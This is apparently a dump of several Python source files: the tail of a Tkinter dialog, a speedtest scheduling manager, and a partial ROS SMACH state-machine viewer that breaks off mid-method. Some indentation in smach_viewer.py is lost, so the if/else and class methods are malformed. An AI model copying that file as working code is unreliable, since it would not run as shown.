    button_elaborate["fg"] = ui_constants.color_fg_button
    button_elaborate["justify"] = "center"
    button_elaborate["text"] = ui_constants.text_annotate
    button_elaborate["relief"] = "flat"
    button_elaborate.place(x=250, y=650, width=200, height=30)
    button_elaborate["command"] = lambda: clicked.set(1)
    # Block here (while keeping the Tk event loop alive) until the button
    # is pressed, then tear the dialog down.
    button_elaborate.wait_variable(clicked)
    appended_root.destroy()
    return numpy.array([0, 1]) if self.selection == 0 else numpy.array([1, 0])
def select_class(self):
    """Store the radio-button choice (0 = contains, 1 = not contains)."""
    chosen = self.class_selection.get()
    self.selection = chosen
def show_alert_working(self):
    """Inform the user that a background process is still running."""
    messagebox.showinfo(
        title=ui_constants.text_oops,
        message=ui_constants.text_process_running,
    )
def print_message(self, message):
    """Append `message` (plus a newline) to the read-only output area.

    If a progress bar was being rendered, first terminate its line and
    clear the progress flag so subsequent output starts fresh.
    """
    area = self.output_area
    if self.printing_progress:
        # Close off the in-progress progress-bar line.
        area.configure(state="normal")
        area.insert(END, "\n")
        area.configure(state="disabled")
        self.printing_progress = False
    # The widget is kept disabled so the user cannot type into it;
    # temporarily enable it for programmatic insertion.
    area.configure(state="normal")
    area.insert(END, "{}\n".format(message))
    area.configure(state="disabled")
def print_progress_bar(self, message):
    """Render `message` as an updating progress line in the output area.

    Keeps all existing text except the last line, then re-inserts it with
    `message` appended, so repeated calls overwrite the progress line
    in place. Sets the flag print_message() uses to know a progress line
    is active.
    """
    self.printing_progress = True
    # Everything except the trailing (progress) line.
    kept_text = self.output_area.get("1.0", "end - 1 lines")
    self.output_area.configure(state="normal")
    self.output_area.delete(1.0, "end")
    self.output_area.insert(END, "{}{}".format(kept_text, message))
    self.output_area.configure(state="disabled")
|
manager.py | import json
import threading
import time
from datetime import datetime
import requests
import speedtest
from bson.json_util import dumps
from . import settings
from . import database
from .logger import logger
class SpeedtestMgr:
    """Runs periodic speedtest measurements on a background thread and
    publishes progress over a socketio channel.

    Lifecycle: construct, then call start(socketio) once; set do_run=False
    to stop, pause=True to suspend between batches.
    """

    def __init__(self):
        self.st = speedtest.Speedtest()
        self.do_run = True          # cleared to stop the worker loop
        self.pause = False          # suspends measurements without stopping
        self.last_result = None     # most recent single-server result dict
        self._sleep = settings.get('scan-interval') * 60  # seconds between batches
        self._thread = None
        self.__status = "none"
        self.__client_info = None
        self.__all_servers = None   # lazily populated by the `servers` property

    def task(self, socketio):
        """Worker loop: measure every configured server, store and emit the
        results, then sleep until the next scheduled batch."""
        while self.do_run:
            if self.pause:
                time.sleep(1)
                continue
            batch_results = []
            start = datetime.utcnow()
            for server_id in settings.get('servers'):
                sv = self.st.get_servers([server_id])
                # get_servers returns {distance: [server, ...]}; take the
                # single server we asked for.
                sv = sv[list(sv.keys())[0]][0]
                logger.debug('Starting speedtest with server: %s (%s - %s) %s',
                             sv['sponsor'], sv['name'], sv['country'], sv['host'])
                self.update_status(socketio, "started", {'timestamp': str(start)})
                # Cancel point
                if not self.do_run:
                    break
                logger.debug('Testing download speed...')
                self.update_status(socketio, "downloading")
                download = self.st.download()
                logger.debug('Download test finished with %s bits', download)
                # Cancel point
                if not self.do_run:
                    break
                logger.debug('Testing upload speed...')
                self.update_status(socketio, "uploading")
                upload = self.st.upload()
                logger.debug('Upload test finished with %s bits', upload)
                # Cancel point
                if not self.do_run:
                    break
                results = self.st.results.dict()
                results['server'] = sv
                results['batch_timestamp'] = start.isoformat()
                batch_results.append(results)
                self.last_result = results
                database.insert_result(results)
                logger.debug('Speedtest finished: %s', results)
                self.update_status(socketio, "finished", json.loads(dumps(results)))
            # Cancel point
            if not self.do_run:
                break
            # Run at the next scheduled time (never sooner than 15 s).
            diff = max(self._sleep - (datetime.utcnow() - start).total_seconds(), 15)
            self.update_status(socketio, "batch_finished", {
                'sleep_time': diff, 'results': json.loads(dumps(batch_results))
            })
            logger.debug('Waiting for {:.3f} seconds for the next measurement.'.format(diff))
            time.sleep(diff)

    def start(self, socketio):
        """Start the worker thread once; subsequent calls are no-ops."""
        if self._thread is not None:
            # logger.warn is a deprecated alias of logger.warning
            logger.warning('SpeedtestMgr$start already invoked.')
            return
        logger.debug('Starting speedtest thread...')
        self._thread = threading.Thread(target=self.task, args=(socketio,))
        self._thread.start()
        logger.debug('Speedtest thread started.')

    @property
    def status(self):
        """Last status string emitted via update_status()."""
        return self.__status

    @property
    def client_info(self):
        """Lazily fetched public-IP / geo info for this client."""
        if self.__client_info is None:
            self.__client_info = requests.get('http://extreme-ip-lookup.com/json/').json()
        return self.__client_info

    @property
    def servers(self):
        """All known speedtest servers, sorted by distance (lazily fetched)."""
        if self.__all_servers is None:
            self.st.get_servers()
            self.__all_servers = [v[0] for k, v in self.st.servers.items()]
            self.__all_servers.sort(key=lambda x: x['d'])
        return self.__all_servers

    def set_test_servers(self, server_list):
        """Restrict testing to the given server id(s).

        Accepts a single int or a list of ids. Raises RuntimeError for any
        other type, or if an id is not in the known server list.
        """
        if not isinstance(server_list, (list, int)):
            raise RuntimeError('server_list must be a list of servers ids or an int')
        if isinstance(server_list, int):
            server_list = [server_list]
        for server_id in server_list:
            # BUG FIX: the original did `for k, server in self.__all_servers`,
            # which tried to tuple-unpack each server dict (ValueError) and
            # could hit `__all_servers is None`. Iterate the `servers`
            # property instead, which also populates the cache on first use.
            found = any(server_id == server['id'] for server in self.servers)
            if not found:
                raise RuntimeError('Server id {} not found'.format(server_id))
        self.st.get_servers(server_list)

    def update_status(self, socketio, status, data=None):
        """Record `status` and broadcast it (with optional `data` payload)."""
        self.__status = status
        payload = {'status': status, 'data': data}
        socketio.emit('speedtest_update', payload)
|
smach_viewer.py | #!/usr/bin/env python
# Copyright (c) 2010, Willow Garage, Inc.
# All rights reserved.
# Copyright (c) 2013, Jonathan Bohren, The Johns Hopkins University
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Author: Jonathan Bohren
import rospy
import rospkg
from smach_msgs.msg import SmachContainerStatus,SmachContainerInitialStatusCmd,SmachContainerStructure
import sys
import os
import threading
import pickle
import pprint
import copy
import StringIO
import colorsys
import time
import wxversion
if wxversion.checkInstalled("2.8"):
wxversion.select("2.8")
else:
print("wxversion 2.8 is not installed, installed versions are {}".format(wxversion.getInstalled()))
import wx
import wx.richtext
import textwrap
## this import system (or ros-released) xdot
# import xdot
## need to import the current package, but not to load this file
# http://stackoverflow.com/questions/6031584/importing-from-builtin-library-when-module-with-same-name-exists
def import_non_local(name, custom_name=None):
    """Import module `name` while excluding this file's own directory from
    the search path, so a same-named local module does not shadow the
    system-wide (or ROS-released) one.

    The loaded module is registered under `custom_name` (defaults to `name`).
    """
    import imp, sys
    custom_name = custom_name or name
    this_dir = os.path.dirname(os.path.abspath(__file__))
    # Search everywhere on sys.path except the directory containing this file.
    search_path = filter(lambda entry: entry != this_dir, sys.path)
    found_file, pathname, description = imp.find_module(name, search_path)
    module = imp.load_module(custom_name, found_file, pathname, description)
    # find_module returns None for the file handle when `name` is a package.
    if found_file:
        found_file.close()
    return module
smach_viewer = import_non_local('smach_viewer')
from smach_viewer import xdot
##
import smach
import smach_ros
### Helper Functions
def graph_attr_string(attrs):
    """Generate an xdot graph attribute string.

    Each key/value pair is rendered as `"k"="v";` on its own line; the
    result always ends with `;\\n` (even for an empty dict).
    """
    # .items() instead of the Python-2-only .iteritems(): identical behavior
    # on Python 2, and keeps the helper working on Python 3.
    attrs_strs = ['"'+str(k)+'"="'+str(v)+'"' for k, v in attrs.items()]
    return ';\n'.join(attrs_strs)+';\n'
def attr_string(attrs):
    """Generate an xdot node attribute string: ` ["k"="v", ...]`."""
    # .items() instead of the Python-2-only .iteritems(): identical behavior
    # on Python 2, and keeps the helper working on Python 3.
    attrs_strs = ['"'+str(k)+'"="'+str(v)+'"' for k, v in attrs.items()]
    return ' ['+(', '.join(attrs_strs))+']'
def get_parent_path(path):
    """Get the parent path of an xdot node.

    '/a/b' -> '/a'; a single-level path like '/a' maps to '' (the root's
    leading empty token).
    """
    tokens = path.split('/')
    # Drop the last component when there is a real parent; otherwise keep
    # only the first token.
    keep = len(tokens) - 1 if len(tokens) > 2 else 1
    return '/'.join(tokens[:keep])
def get_label(path):
    """Get the label (final '/'-separated component) of an xdot node path."""
    return path.rsplit('/', 1)[-1]
def hex2t(color_str):
    """Convert a hexadecimal color string (e.g. '#RRGGBB' or '#RRGGBBAA')
    into a list of float channels in [0, 1].

    The leading '#' is skipped; each subsequent two-character pair becomes
    one channel.
    """
    channels = []
    for i in range(1, len(color_str), 2):
        channels.append(int(color_str[i:i+2], 16) / 255.0)
    return channels
class ContainerNode():
    """
    This class represents a given container in a running SMACH system.

    Its primary use is to generate dotcode for a SMACH container. It has
    methods for responding to structure and status messages from a SMACH
    introspection server, as well as methods for updating the styles of a
    graph once it's been drawn.
    """
    def __init__(self, server_name, msg):
        # Store path info from the structure message
        self._server_name = server_name
        self._path = msg.path
        splitpath = msg.path.split('/')
        self._label = splitpath[-1]
        self._dir = '/'.join(splitpath[0:-1])
        # Structure: child state labels and the transition tables
        # (parallel lists: outcome label, source state, target state).
        self._children = msg.children
        self._internal_outcomes = msg.internal_outcomes
        self._outcomes_from = msg.outcomes_from
        self._outcomes_to = msg.outcomes_to
        self._container_outcomes = msg.container_outcomes
        # Status
        self._initial_states = []
        self._active_states = []
        self._last_active_states = []
        self._local_data = smach.UserData()
        self._info = ''
    def update_structure(self, msg):
        """Update the structure of this container from a given message. Return True if anything changes."""
        needs_update = False
        if self._children != msg.children\
                or self._internal_outcomes != msg.internal_outcomes\
                or self._outcomes_from != msg.outcomes_from\
                or self._outcomes_to != msg.outcomes_to\
                or self._container_outcomes != msg.container_outcomes:
            needs_update = True
        if needs_update:
            self._children = msg.children
            self._internal_outcomes = msg.internal_outcomes
            self._outcomes_from = msg.outcomes_from
            self._outcomes_to = msg.outcomes_to
            self._container_outcomes = msg.container_outcomes
        return needs_update
    def update_status(self, msg):
        """Update the known userdata and active state set and return True if the graph needs to be redrawn."""
        # Initialize the return value
        needs_update = False
        # Check if the initial states or active states have changed
        if set(msg.initial_states) != set(self._initial_states):
            # NOTE(review): _structure_changed is never read on ContainerNode
            # (SmachViewerFrame has an attribute of the same name) — verify.
            self._structure_changed = True
            needs_update = True
        if set(msg.active_states) != set(self._active_states):
            needs_update = True
        # Store the initial and active states
        self._initial_states = msg.initial_states
        self._last_active_states = self._active_states
        self._active_states = msg.active_states
        # Unpack the user data; retry after loading the manifest of any
        # package whose module the pickle payload needs.
        while not rospy.is_shutdown():
            try:
                self._local_data._data = pickle.loads(msg.local_data)
                break
            except ImportError as ie:
                # This will only happen once for each package
                # NOTE(review): `roslib` is not imported in this file, so this
                # recovery path would raise NameError if ever taken — verify.
                modulename = ie.args[0][16:]
                packagename = modulename[0:modulename.find('.')]
                roslib.load_manifest(packagename)
                self._local_data._data = pickle.loads(msg.local_data)
        # Store the info string
        self._info = msg.info
        return needs_update
    def get_dotcode(self, selected_paths, closed_paths, depth, max_depth, containers, show_all, label_wrapper, attrs={}):
        """Generate the dotcode representing this container.

        @param selected_paths: The paths to nodes that are selected
        @closed paths: The paths that shouldn't be expanded
        @param depth: The depth to start traversing the tree
        @param max_depth: The depth to which we should traverse the tree
        @param containers: A dict of containers keyed by their paths
        @param show_all: True if implicit transitions should be shown
        @param label_wrapper: A text wrapper for wrapping element names
        @param attrs: A dict of dotcode attributes for this cluster
        """
        # NOTE(review): `attrs={}` is a shared mutable default; callers here
        # always pass a fresh dict except the depth-0 root call — verify.
        dotstr = 'subgraph "cluster_%s" {\n' % (self._path)
        if depth == 0:
            #attrs['style'] = 'filled,rounded'
            attrs['color'] = '#00000000'
            attrs['fillcolor'] = '#0000000F'
            #attrs['rank'] = 'max'
        #,'succeeded','aborted','preempted'attrs['label'] = self._label
        dotstr += graph_attr_string(attrs)
        # Add start/terminate target: an invisible proxy node carrying the
        # container's label, used as the anchor for edges into/out of it.
        proxy_attrs = {
                'URL':self._path,
                'shape':'plaintext',
                'color':'gray',
                'fontsize':'18',
                'fontweight':'18',
                'rank':'min',
                'height':'0.01'}
        proxy_attrs['label'] = '\\n'.join(label_wrapper.wrap(self._label))
        dotstr += '"%s" %s;\n' % (
                '/'.join([self._path,'__proxy__']),
                attr_string(proxy_attrs))
        # Check if we should expand this container
        if max_depth == -1 or depth <= max_depth:
            # Add container outcomes in their own nested cluster
            dotstr += 'subgraph "cluster_%s" {\n' % '/'.join([self._path,'__outcomes__'])
            outcomes_attrs = {
                    'style':'rounded,filled',
                    'rank':'sink',
                    'color':'#FFFFFFFF',#'#871C34',
                    'fillcolor':'#FFFFFF00'#'#FE464f3F'#'#DB889A'
            }
            dotstr += graph_attr_string(outcomes_attrs)
            for outcome_label in self._container_outcomes:
                # Outcome nodes use "path:outcome" ids so edges can target them.
                outcome_path = ':'.join([self._path,outcome_label])
                outcome_attrs = {
                        'shape':'box',
                        'height':'0.3',
                        'style':'filled,rounded',
                        'fontsize':'12',
                        'fillcolor':'#FE464f',#'#EDC2CC',
                        'color':'#780006',#'#EBAEBB',
                        'fontcolor':'#780006',#'#EBAEBB',
                        'label':'',
                        'xlabel':'\\n'.join(label_wrapper.wrap(outcome_label)),
                        'URL':':'.join([self._path,outcome_label])
                }
                dotstr += '"%s" %s;\n' % (outcome_path,attr_string(outcome_attrs))
            dotstr += "}\n"
            # Iterate over children, recursing into known sub-containers
            for child_label in self._children:
                child_attrs = {
                        'style':'filled,setlinewidth(2)',
                        'color':'#000000FF',
                        'fillcolor':'#FFFFFF00'
                }
                child_path = '/'.join([self._path,child_label])
                # Generate dotcode for children
                if child_path in containers:
                    child_attrs['style'] += ',rounded'
                    dotstr += containers[child_path].get_dotcode(
                            selected_paths,
                            closed_paths,
                            depth+1, max_depth,
                            containers,
                            show_all,
                            label_wrapper,
                            child_attrs)
                else:
                    # Leaf state: a plain node with a wrapped label
                    child_attrs['label'] = '\\n'.join(label_wrapper.wrap(child_label))
                    child_attrs['URL'] = child_path
                    dotstr += '"%s" %s;\n' % (child_path, attr_string(child_attrs))
            # Iterate over edges: (outcome, from-state, to-state) triples
            internal_edges = zip(
                    self._internal_outcomes,
                    self._outcomes_from,
                    self._outcomes_to)
            # Add edge from container label to initial state
            # NOTE(review): `+=` on the result of zip() requires the Python 2
            # list semantics of zip; under Python 3 this would raise — verify.
            internal_edges += [('','__proxy__',initial_child) for initial_child in self._initial_states]
            # States with at least one explicit (non-'None') transition;
            # implicit transitions from these may be hidden below.
            has_explicit_transitions = []
            for (outcome_label,from_label,to_label) in internal_edges:
                if to_label != 'None' or outcome_label == to_label:
                    has_explicit_transitions.append(from_label)
            # Draw internal edges
            for (outcome_label,from_label,to_label) in internal_edges:
                from_path = '/'.join([self._path, from_label])
                if show_all \
                        or to_label != 'None'\
                        or from_label not in has_explicit_transitions \
                        or (outcome_label == from_label) \
                        or from_path in containers:
                    # Set the implicit target of this outcome
                    if to_label == 'None':
                        to_label = outcome_label
                    to_path = '/'.join([self._path, to_label])
                    edge_attrs = {
                            'URL':':'.join([from_path,outcome_label,to_path]),
                            'fontsize':'12',
                            'label':'',
                            'xlabel':'\\n'.join(label_wrapper.wrap(outcome_label))}
                    edge_attrs['style'] = 'setlinewidth(2)'
                    # Hide implicit
                    #if not show_all and to_label == outcome_label:
                    #    edge_attrs['style'] += ',invis'
                    from_key = '"%s"' % from_path
                    if from_path in containers:
                        if max_depth == -1 or depth+1 <= max_depth:
                            # Expanded sub-container: edge starts at its outcome node
                            from_key = '"%s:%s"' % ( from_path, outcome_label)
                        else:
                            # Collapsed sub-container: clip the edge at the cluster
                            # border and start it from the proxy node.
                            edge_attrs['ltail'] = 'cluster_'+from_path
                            from_path = '/'.join([from_path,'__proxy__'])
                            from_key = '"%s"' % ( from_path )
                    to_key = ''
                    if to_label in self._container_outcomes:
                        # Edge terminates at one of this container's outcome nodes
                        to_key = '"%s:%s"' % (self._path,to_label)
                        edge_attrs['color'] = '#00000055'# '#780006'
                    else:
                        if to_path in containers:
                            # Clip at the target cluster and aim at its proxy node
                            edge_attrs['lhead'] = 'cluster_'+to_path
                            to_path = '/'.join([to_path,'__proxy__'])
                        to_key = '"%s"' % to_path
                    dotstr += '%s -> %s %s;\n' % (
                            from_key, to_key, attr_string(edge_attrs))
        dotstr += '}\n'
        return dotstr
    def set_styles(self, selected_paths, depth, max_depth, items, subgraph_shapes, containers):
        """Update the styles for a list of containers without regenerating the dotcode.

        This function is called recursively to update an entire tree.

        @param selected_paths: A list of paths to nodes that are currently selected.
        @param depth: The depth to start traversing the tree
        @param max_depth: The depth to traverse into the tree
        @param items: A dict of all the graph items, keyed by url
        @param subgraph_shapes: A dictionary of shapes from the rendering engine
        @param containers: A dict of all the containers
        """
        # Color root container
        """
        if depth == 0:
            container_shapes = subgraph_shapes['cluster_'+self._path]
            container_color = (0,0,0,0)
            container_fillcolor = (0,0,0,0)
            for shape in container_shapes:
                shape.pen.color = container_color
                shape.pen.fillcolor = container_fillcolor
        """
        # Color shapes for outcomes
        # Color children
        if max_depth == -1 or depth <= max_depth:
            # Iterate over children
            for child_label in self._children:
                child_path = '/'.join([self._path,child_label])
                # Default (inactive) style: gray outline, white fill
                child_color = [0.5,0.5,0.5,1]
                child_fillcolor = [1,1,1,1]
                child_linewidth = 2
                active_color = hex2t('#5C7600FF')
                active_fillcolor = hex2t('#C0F700FF')
                initial_color = hex2t('#000000FF')
                initial_fillcolor = hex2t('#FFFFFFFF')
                if child_label in self._active_states:
                    # Check if the child is active
                    child_color = active_color
                    child_fillcolor = active_fillcolor
                    child_linewidth = 5
                elif child_label in self._initial_states:
                    # Initial style
                    #child_fillcolor = initial_fillcolor
                    child_color = initial_color
                    child_linewidth = 2
                # Check if the child is selected
                if child_path in selected_paths:
                    child_color = hex2t('#FB000DFF')
                # Generate dotcode for child containers
                if child_path in containers:
                    subgraph_id = 'cluster_'+child_path
                    if subgraph_id in subgraph_shapes:
                        if child_label in self._active_states:
                            child_fillcolor[3] = 0.25
                        elif 0 and child_label in self._initial_states:
                            # Disabled branch (the `0 and` makes it dead code)
                            child_fillcolor[3] = 0.25
                        else:
                            # Fade deeper clusters progressively toward gray
                            if max_depth > 0:
                                v = 1.0-0.25*((depth+1)/float(max_depth))
                            else:
                                v = 0.85
                            child_fillcolor = [v,v,v,1.0]
                        for shape in subgraph_shapes['cluster_'+child_path]:
                            pen = shape.pen
                            # Preserve the existing outline opacity (snapping
                            # near-zero opacities to fully transparent).
                            if len(pen.color) > 3:
                                pen_color_opacity = pen.color[3]
                                if pen_color_opacity < 0.01:
                                    pen_color_opacity = 0
                            else:
                                pen_color_opacity = 0.5
                            shape.pen.color = child_color[0:3]+[pen_color_opacity]
                            shape.pen.fillcolor = [child_fillcolor[i] for i in range(min(3,len(pen.fillcolor)))]
                            shape.pen.linewidth = child_linewidth
                        # Recurse on this child
                        containers[child_path].set_styles(
                                selected_paths,
                                depth+1, max_depth,
                                items,
                                subgraph_shapes,
                                containers)
                else:
                    # Plain leaf state: restyle all its non-text shapes
                    if child_path in items:
                        for shape in items[child_path].shapes:
                            if not isinstance(shape,xdot.xdot.TextShape):
                                shape.pen.color = child_color
                                shape.pen.fillcolor = child_fillcolor
                                shape.pen.linewidth = child_linewidth
                    else:
                        #print child_path+" NOT IN "+str(items.keys())
                        pass
class SmachViewerFrame(wx.Frame):
"""
This class provides a GUI application for viewing SMACH plans.
"""
def __init__(self):
    """Build the viewer window: toolbar, xdot graph view, tree view,
    userdata pane, and the background threads that keep them updated."""
    wx.Frame.__init__(self, None, -1, "Smach Viewer", size=(720,480))
    # Create graph state and the condition variable the worker threads wait on
    self._containers = {}
    self._top_containers = {}
    self._update_cond = threading.Condition()
    self._needs_refresh = True
    self.dotstr = ''
    vbox = wx.BoxSizer(wx.VERTICAL)
    # Create Splitter between the viewer notebook and the userdata pane
    self.content_splitter = wx.SplitterWindow(self, -1, style=wx.SP_LIVE_UPDATE)
    self.content_splitter.SetMinimumPaneSize(24)
    self.content_splitter.SetSashGravity(0.85)
    # Create viewer pane
    viewer = wx.Panel(self.content_splitter, -1)
    # Create smach viewer notebook (Graph View / Tree View tabs)
    nb = wx.Notebook(viewer, -1, style=wx.NB_TOP | wx.WANTS_CHARS)
    viewer_box = wx.BoxSizer()
    viewer_box.Add(nb, 1, wx.EXPAND | wx.ALL, 4)
    viewer.SetSizer(viewer_box)
    # Create graph view
    graph_view = wx.Panel(nb, -1)
    gv_vbox = wx.BoxSizer(wx.VERTICAL)
    graph_view.SetSizer(gv_vbox)
    # Construct toolbar
    toolbar = wx.ToolBar(graph_view, -1)
    toolbar.AddControl(wx.StaticText(toolbar, -1, "Path: "))
    # Path list: which container path is rendered as the graph root
    self.path_combo = wx.ComboBox(toolbar, -1, style=wx.CB_DROPDOWN)
    self.path_combo.Bind(wx.EVT_COMBOBOX, self.set_path)
    self.path_combo.Append('/')
    self.path_combo.SetValue('/')
    toolbar.AddControl(self.path_combo)
    # Depth spinner: -1 means unlimited traversal depth
    self.depth_spinner = wx.SpinCtrl(toolbar, -1,
            size=wx.Size(50, -1),
            min=-1,
            max=1337,
            initial=-1)
    self.depth_spinner.Bind(wx.EVT_SPINCTRL, self.set_depth)
    self._max_depth = -1
    toolbar.AddControl(wx.StaticText(toolbar, -1, " Depth: "))
    toolbar.AddControl(self.depth_spinner)
    # Label width spinner: wrap width for node labels
    self.width_spinner = wx.SpinCtrl(toolbar, -1,
            size=wx.Size(50, -1),
            min=1,
            max=1337,
            initial=40)
    self.width_spinner.Bind(wx.EVT_SPINCTRL, self.set_label_width)
    self._label_wrapper = textwrap.TextWrapper(40, break_long_words=True)
    toolbar.AddControl(wx.StaticText(toolbar, -1, " Label Width: "))
    toolbar.AddControl(self.width_spinner)
    # Implicit transition display toggle
    toggle_all = wx.ToggleButton(toolbar, -1, 'Show Implicit')
    toggle_all.Bind(wx.EVT_TOGGLEBUTTON, self.toggle_all_transitions)
    self._show_all_transitions = False
    toolbar.AddControl(wx.StaticText(toolbar, -1, " "))
    toolbar.AddControl(toggle_all)
    # Auto-focus toggle: follow the active state automatically
    toggle_auto_focus = wx.ToggleButton(toolbar, -1, 'Auto Focus')
    toggle_auto_focus.Bind(wx.EVT_TOGGLEBUTTON, self.toggle_auto_focus)
    self._auto_focus = False
    toolbar.AddControl(wx.StaticText(toolbar, -1, " "))
    toolbar.AddControl(toggle_auto_focus)
    toolbar.AddControl(wx.StaticText(toolbar, -1, " "))
    # Help and save-dot-graph tools
    toolbar.AddLabelTool(wx.ID_HELP, 'Help',
            wx.ArtProvider.GetBitmap(wx.ART_HELP, wx.ART_OTHER, (16, 16)) )
    toolbar.AddLabelTool(wx.ID_SAVE, 'Save',
            wx.ArtProvider.GetBitmap(wx.ART_FILE_SAVE, wx.ART_OTHER, (16, 16)) )
    toolbar.Realize()
    self.Bind(wx.EVT_TOOL, self.ShowControlsDialog, id=wx.ID_HELP)
    self.Bind(wx.EVT_TOOL, self.SaveDotGraph, id=wx.ID_SAVE)
    # Create dot graph widget
    self.widget = xdot.wxxdot.WxDotWindow(graph_view, -1)
    gv_vbox.Add(toolbar, 0, wx.EXPAND)
    gv_vbox.Add(self.widget, 1, wx.EXPAND)
    # Create tree view widget
    self.tree = wx.TreeCtrl(nb, -1, style=wx.TR_HAS_BUTTONS)
    nb.AddPage(graph_view, "Graph View")
    nb.AddPage(self.tree, "Tree View")
    # Create userdata widget (right-hand pane)
    borders = wx.LEFT | wx.RIGHT | wx.TOP
    border = 4
    self.ud_win = wx.ScrolledWindow(self.content_splitter, -1)
    self.ud_gs = wx.BoxSizer(wx.VERTICAL)
    self.ud_gs.Add(wx.StaticText(self.ud_win, -1, "Path:"), 0, borders, border)
    self.path_input = wx.ComboBox(self.ud_win, -1, style=wx.CB_DROPDOWN)
    self.path_input.Bind(wx.EVT_COMBOBOX, self.selection_changed)
    self.ud_gs.Add(self.path_input, 0, wx.EXPAND | borders, border)
    self.ud_gs.Add(wx.StaticText(self.ud_win, -1, "Userdata:"), 0, borders, border)
    self.ud_txt = wx.TextCtrl(self.ud_win, -1, style=wx.TE_MULTILINE | wx.TE_READONLY)
    self.ud_gs.Add(self.ud_txt, 1, wx.EXPAND | borders, border)
    # Add initial state button (enabled only when a container is selected)
    self.is_button = wx.Button(self.ud_win, -1, "Set as Initial State")
    self.is_button.Bind(wx.EVT_BUTTON, self.on_set_initial_state)
    self.is_button.Disable()
    self.ud_gs.Add(self.is_button, 0, wx.EXPAND | wx.BOTTOM | borders, border)
    self.ud_win.SetSizer(self.ud_gs)
    # Set content splitter
    self.content_splitter.SplitVertically(viewer, self.ud_win, 512)
    # Add statusbar
    self.statusbar = wx.StatusBar(self, -1)
    # Add elements to sizer
    vbox.Add(self.content_splitter, 1, wx.EXPAND | wx.ALL)
    vbox.Add(self.statusbar, 0, wx.EXPAND)
    self.SetSizer(vbox)
    self.Center()
    # smach introspection client
    self._client = smach_ros.IntrospectionClient()
    # NOTE(review): _containers was already initialized above — this second
    # assignment discards nothing yet but is redundant; verify before removing.
    self._containers = {}
    self._selected_paths = []
    # Message subscribers, keyed by introspection server name
    self._structure_subs = {}
    self._status_subs = {}
    self.Bind(wx.EVT_IDLE, self.OnIdle)
    self.Bind(wx.EVT_CLOSE, self.OnQuit)
    # Register mouse event callback for node selection in the graph
    self.widget.register_select_callback(self.select_cb)
    self._path = '/'
    self._needs_zoom = True
    self._structure_changed = True
    # Start a thread in the background to update the server list,
    # plus the graph- and tree-refresh worker threads.
    self._keep_running = True
    self._server_list_thread = threading.Thread(target=self._update_server_list)
    self._server_list_thread.start()
    self._update_graph_thread = threading.Thread(target=self._update_graph)
    self._update_graph_thread.start()
    self._update_tree_thread = threading.Thread(target=self._update_tree)
    self._update_tree_thread.start()
def OnQuit(self, event):
    """Quit Event: signal the worker threads to stop, wake them, wait for
    them to finish, then let wx continue closing the frame."""
    with self._update_cond:
        self._keep_running = False
        # Wake every thread blocked on the condition so it can observe
        # _keep_running and exit its loop.
        self._update_cond.notify_all()
    for worker in (self._server_list_thread,
                   self._update_graph_thread,
                   self._update_tree_thread):
        worker.join()
    event.Skip()
def update_graph(self):
    """Wake all waiting worker threads so the graph gets redrawn."""
    cond = self._update_cond
    with cond:
        cond.notify_all()
def on_set_initial_state(self, event):
    """Event: ask the introspection server to make the currently selected
    state the initial state of its parent container."""
    selected = self._selected_paths[0]
    parent = get_parent_path(selected)
    state_label = get_label(selected)
    server = self._containers[parent]._server_name
    self._client.set_initial_state(server, parent, [state_label], timeout=rospy.Duration(60.0))
def set_path(self, event):
    """Event: the path combo box changed; view the newly chosen path."""
    chosen = self.path_combo.GetValue()
    self._path = chosen
    self._needs_zoom = True
    self.update_graph()
def _set_path(self, path):
    """Programmatically change the viewed path, keeping the combo box in
    sync, and trigger a redraw."""
    self._path = path
    self._needs_zoom = True
    self.path_combo.SetValue(path)
    self.update_graph()
def set_depth(self, event):
    """Event: the depth spinner changed; update the maximum render depth."""
    depth_value = self.depth_spinner.GetValue()
    self._max_depth = depth_value
    self._needs_zoom = True
    self.update_graph()
def _set_max_depth(self, max_depth):
    """Programmatically set the maximum depth, keeping the spinner in sync,
    and trigger a redraw."""
    self._max_depth = max_depth
    self.depth_spinner.SetValue(max_depth)
    self._needs_zoom = True
    self.update_graph()
def set_label_width(self, event):
    """Event: the width spinner changed; update the label wrap width."""
    new_width = self.width_spinner.GetValue()
    self._label_wrapper.width = new_width
    self._needs_zoom = True
    self.update_graph()
def toggle_all_transitions(self, event):
    """Event: flip whether implicit (automatic) transitions are drawn,
    mark the structure dirty, and redraw."""
    self._show_all_transitions = not self._show_all_transitions
    self._structure_changed = True
    self.update_graph()
def toggle_auto_focus(self, event):
    """Event: enable/disable automatically focusing on the active state.

    When auto-focus turns off, reset the view to the root path with
    unlimited depth.
    """
    self._auto_focus = not self._auto_focus
    self._needs_zoom = self._auto_focus
    self._structure_changed = True
    if not self._auto_focus:
        self._set_path('/')
        self._set_max_depth(-1)
    self.update_graph()
def select_cb(self, item, event):
    """Event: a graph item was clicked; select it and show its user data.

    Only items whose URL is a string are selectable. On a left-button
    release, the URL becomes the selected path, the selection dropdown is
    updated (posting a combobox event so selection_changed fires), and the
    graph is redrawn.
    """
    # isinstance instead of `type(...) is str`: same behavior here, but also
    # accepts str subclasses and is the idiomatic type check.
